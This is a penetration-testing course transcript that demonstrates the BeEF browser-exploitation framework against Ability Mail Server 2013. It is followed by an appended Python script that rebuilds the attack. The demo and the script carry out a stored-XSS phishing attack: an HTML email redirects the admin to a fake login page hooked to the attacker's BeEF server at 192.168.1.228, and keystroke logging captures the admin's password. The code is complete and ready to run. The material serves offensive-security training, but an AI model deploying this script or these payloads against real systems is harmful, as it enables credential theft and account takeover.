BeEF Framework Demo


Difficulty
Intermediate
Video Transcription
>> We have the BeEF framework up and running in our browser. We've already launched it, but let's follow our methodology. We typically do our Nmap scan. Let's say I have a host, I already have some information that port 25 is open, and I want to figure out what the version is of whatever software is running on port 25. I can see it's Code-Crafters Ability Mail Server smtpd 2013.

We can do searchsploit for the Ability Mail Server 2013, and we see that we have two exploits for persistent cross-site scripting vulnerabilities, and there's a Python script here. I can also go to that or search for that in Exploit DB.

This is what differentiates you from script kiddies: the fact that you can look at this script, and this is what you need to do for OSEP, and you need to start picking this apart. I'm doing this early, because there's a public exploit module, but let's start thinking about this now. I see a hard-coded IP; I need to change that. I see port 25; that's good, we already have port 25. I see an email address of user@hack.local; is that going to be the same for our environment? Start thinking about it. You don't have to know Python per se, but you should understand the underlying code and be able to modify the code, which is what I did. I took a look at the code and I said, "I need to change this to fit my environment." Let me show you my code.

What I did is I modified the code. I know that there's a user@localhost and there's an admin@localhost. My objective is to get the username and password of the admin user. You can see here that the content type is text/html, which is important because it will do our script tag here. Script document.location, I'll show you that in the slides, is my controlled server 192.168.1.228 and this index page, so it should redirect the victim to our control page. It's going to look a lot like the login page for this application. Here is the victim's IP address, port 25. The login is user@localhost. I already have this information; their password is user, and I'm sending it from user to admin. Let's launch this and give it a go and see what happens.

Here we go. I'm launching this. Here's my admin. He or she is going to log in, and they're going to go to the inbox. They see they have a message and it says, "Urgent, please read." Well, they've got to read it. They click and it says, "You've been logged out. Please log back in." Okay, well, there are my credentials again, click "Login". Something's not working here. Let's go back and then I'll know what's going on.

If we go back, let's take a look at BeEF and we see we've hooked their browser here. Internet Explorer. Wow, they're old school. This isn't the old-school box, the XP. But we have a whole bunch of information here. Let's look at logs, and you can see here that there's a whole bunch of information. It captures all the keystrokes on the page. You can see that the user is admin and the password is password12345. If I wanted to, I could then go in on port 8000, and now I can log in as the admin. There we go.

I could also do some other things, like, if you really like the big scary one that I showed you before, create alert dialog. Just in case you want to give it a try. Let's see if that executes; there you go. "Message from webpage." I hope you see that BeEF is much more impactful on what you can do. There's a bunch of other things you can do here, but for my purposes as the attacker, I have what I came for. I came for the username and password, and I got it. Play around with BeEF, see if you like it. Again, it's a client-side attack, so you need someone to click on the link and execute it.

What I also want to show you was, if we're here, if we view the source of the page, I should see, here it is; the script tag that I made on my evil page. I made it look like the login for this application, but buried in all this script or all this HTML is this script tag for my BeEF hook right there. Sure, a savvy victim will be able to see that, but it's too late for them. But that's how I made that page.

Hopefully that makes sense, but again, remember methodology: scan, enumerate, figure out the version. Ultimately from that, look at public exploit code and modify it to fit your environment and then grab the username and password of the victim.
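The following is an added example, not the instructor's modified script, the Exploit-DB module, or BeEF's own code. It reconstructs the two pieces the demo walks through: the text/html e-mail whose script tag sends the reader's browser to the attacker's page, and the look-alike login page that carries the BeEF hook. The values the transcript names (port 25, user@localhost / user, admin@localhost, 192.168.1.228, the "Urgent, please read" subject) are used as defaults; the victim mail-server address, the function names, the use of Python's standard email and smtplib modules, the BeEF hook URL (BeEF's default port 3000 and hook.js path), and the shape of the lure form are assumptions, and the example does not verify where in the target product the injected HTML is rendered.

```python
"""Added example: build the XSS-bearing e-mail and the BeEF lure page
described in the demo. Not the course's or BeEF's code.

Assumed (not from the page): TARGET_HOST, the hook URL, the lure form
layout, and that the recipient's webmail renders the text/html body
without sanitising it.
"""
import smtplib
from email.message import EmailMessage

# Values from the demo; change them to fit your environment, as the
# transcript says to do with the public script's hard-coded IP/addresses.
TARGET_HOST = "192.168.1.10"                      # assumed victim mail server
TARGET_PORT = 25
SMTP_USER = "user@localhost"
SMTP_PASS = "user"
SENDER = "user@localhost"
RECIPIENT = "admin@localhost"
ATTACKER_URL = "http://192.168.1.228/index.html"  # attacker-controlled page
BEEF_HOOK_URL = "http://192.168.1.228:3000/hook.js"  # assumed BeEF default
SUBJECT = "Urgent, please read"


def build_html_body(attacker_url: str) -> str:
    """HTML body that redirects the reader's browser to the attacker page.

    document.location replaces the current page, so the victim lands on
    the look-alike login page that carries the BeEF hook.
    """
    return (
        "<html><body>"
        "<p>Please read the attached notice.</p>"
        f'<script>document.location="{attacker_url}";</script>'
        "</body></html>"
    )


def build_message(sender: str, recipient: str, subject: str,
                  attacker_url: str) -> EmailMessage:
    """Assemble the message with a text/html body.

    The content type is the important part: a text/plain body would show
    the <script> tag as literal text instead of executing it.
    """
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg.set_content(build_html_body(attacker_url), subtype="html")
    return msg


def build_lure_page(hook_url: str, action: str = "/login") -> str:
    """Fake 'You have been logged out' login page with the BeEF hook buried
    at the bottom, as seen in the demo's view-source. BeEF's keystroke
    logging captures whatever the victim types into the form."""
    return (
        "<html><head><title>Ability Mail Server - Login</title></head><body>"
        "<p>You have been logged out. Please log back in.</p>"
        f'<form method="post" action="{action}">'
        '<input name="user" placeholder="Username">'
        '<input name="password" type="password" placeholder="Password">'
        '<input type="submit" value="Login"></form>'
        f'<script src="{hook_url}"></script>'   # the BeEF hook
        "</body></html>"
    )


def send_message(msg: EmailMessage, host: str, port: int,
                 user: str, password: str) -> None:
    """Deliver the message over SMTP with AUTH, as the demo's script does."""
    with smtplib.SMTP(host, port, timeout=10) as smtp:
        smtp.login(user, password)
        smtp.send_message(msg)


def main() -> None:
    msg = build_message(SENDER, RECIPIENT, SUBJECT, ATTACKER_URL)
    print(msg.as_string())
    with open("index.html", "w", encoding="utf-8") as fh:
        fh.write(build_lure_page(BEEF_HOOK_URL))
    send_message(msg, TARGET_HOST, TARGET_PORT, SMTP_USER, SMTP_PASS)


if __name__ == "__main__":
    main()
```

Run main() only against a target you are authorised to test; the script writes index.html for your attacker web server and then sends the e-mail. Before sending, print the message and check the three things the transcript tells you to check in any public exploit: the server address and port, the sender/recipient addresses that exist in your environment, and that the Content-Type header really says text/html.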